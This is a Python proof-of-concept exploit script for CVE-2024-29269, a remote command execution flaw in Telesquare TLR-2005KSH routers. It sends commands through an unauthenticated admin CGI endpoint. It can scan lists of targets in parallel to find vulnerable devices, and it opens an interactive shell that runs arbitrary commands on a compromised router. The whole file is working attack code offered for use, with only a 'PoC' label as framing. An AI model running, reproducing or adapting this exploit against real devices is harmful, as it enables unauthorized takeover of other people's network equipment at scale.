CVE-2024-29269.py

#!/usr/bin/env python3

import requests
import argparse
import concurrent.futures
from rich.console import Console
from alive_progress import alive_bar
import xml.etree.ElementTree as ET
from prompt_toolkit import PromptSession, HTML
from prompt_toolkit.history import InMemoryHistory
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

console = Console()

def ascii_art():
    print("")
    console.print("[bold bright_magenta] ██████ ██    ██ ███████       ██████   ██████  ██████  ██   ██       ██████   █████  ██████   ██████   █████[/bold bright_magenta]")
    console.print("[bold bright_magenta]██      ██    ██ ██                 ██ ██  ████      ██ ██   ██            ██ ██   ██      ██ ██       ██   ██[/bold bright_magenta]")
    console.print("[bold bright_magenta]██      ██    ██ █████   █████  █████  ██ ██ ██  █████  ███████ █████  █████   ██████  █████  ███████   ██████[/bold bright_magenta]")
    console.print("[bold bright_magenta]██       ██  ██  ██            ██      ████  ██ ██           ██       ██           ██ ██      ██    ██      ██[/bold bright_magenta]")
    console.print("[bold bright_magenta] ██████   ████   ███████       ███████  ██████  ███████      ██       ███████  █████  ███████  ██████   █████[/bold bright_magenta]")
    print("")
    print("Coded By: K3ysTr0K3R")
    print("")

test_cmd = "ifconfig"
path = "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
matcher = [
    '<CmdResult>',
    '</xml>',
    'Ethernet',
    'inet'
]

headers = {"User-Agent": "Mozilla/5.0 (Linux; Android 6.0.1; vivo 1603 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36"}

def exploit(target):
    url = target + path + test_cmd
    try:
        response = requests.get(url, timeout=10, headers=headers, verify=False)
        response.raise_for_status()
        for element in matcher:
            if element in response.text:
                console.print(f"[bold bright_green][+][/bold bright_green] The target appears to be vulnerable: [bold bright_cyan]{target}[/bold bright_cyan]")
                return True
    except requests.exceptions.RequestException:
        return False

def execute_command(target, cmd, headers):
    command_url = target + path + cmd
    try:
        response = requests.get(command_url, timeout=10, headers=headers, verify=False)
        response.raise_for_status()
        root = ET.fromstring(response.content)
        result = []
        for cmd_result in root.findall('.//CmdResult'):
            result.append(cmd_result.text.strip())
        return "\n".join(result)
    except requests.exceptions.RequestException as e:
        console.print(f"[red][-][/red] Error executing command: {e}")
        return None
    except ET.ParseError:
        return None

def interactive_shell(target, headers):
    console.print("[blue][*][/blue] Initiating interactive shell")
    session = PromptSession(history=InMemoryHistory())
    console.print("[bold bright_green][+][/bold bright_green] Interactive shell opened successfully")
    while True:
        try:
            cmd = session.prompt(HTML("<ansicyan><b>Shell> </b></ansicyan>"), default="").strip()
            if cmd.lower() == "exit":
                break
            elif cmd.lower() == "clear":
                clear_console()
                continue
            output = execute_command(target, cmd, headers)
            if output:
                print(output)
            else:
                console.print("[red][-][/red] No output from command")
        except KeyboardInterrupt:
            console.print("[red][-][/red] Exiting interactive shell")
            break

def clear_console():
    print("\033c", end="")

def scan_from_file(file_path, threads):
    with open(file_path, 'r') as f:
        targets = [line.strip() for line in f if line.strip()]

    with alive_bar(len(targets), title="Scanning targets", bar="blocks", enrich_print=False) as bar:
        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
            future_to_target = {executor.submit(exploit, target): target for target in targets}
            for future in concurrent.futures.as_completed(future_to_target):
                target = future_to_target[future]
                bar()

def main():
    ascii_art()
    parser = argparse.ArgumentParser(description="A PoC exploit for CVE-2024-29269 - Telesquare TLR-2005KSH Remote Code Execution (RCE)")
    parser.add_argument('-u', '--url', help="Single URL to exploit.")
    parser.add_argument('-f', '--file', help="File containing URLs to scan.")
    parser.add_argument('-t', '--threads', type=int, default=5, help="Number of threads to use for scanning.")

    args = parser.parse_args()

    if args.file:
        scan_from_file(args.file, args.threads)
    elif args.url:
        console.print("[blue][*][/blue] Checking if the target is vulnerable")
        if exploit(args.url):
            interactive_shell(args.url, headers)
        else:
            console.print("[red][-][/red] The target does not appear to be vulnerable")
            exit()
    else:
        parser.print_help()

if __name__ == "__main__":
    main()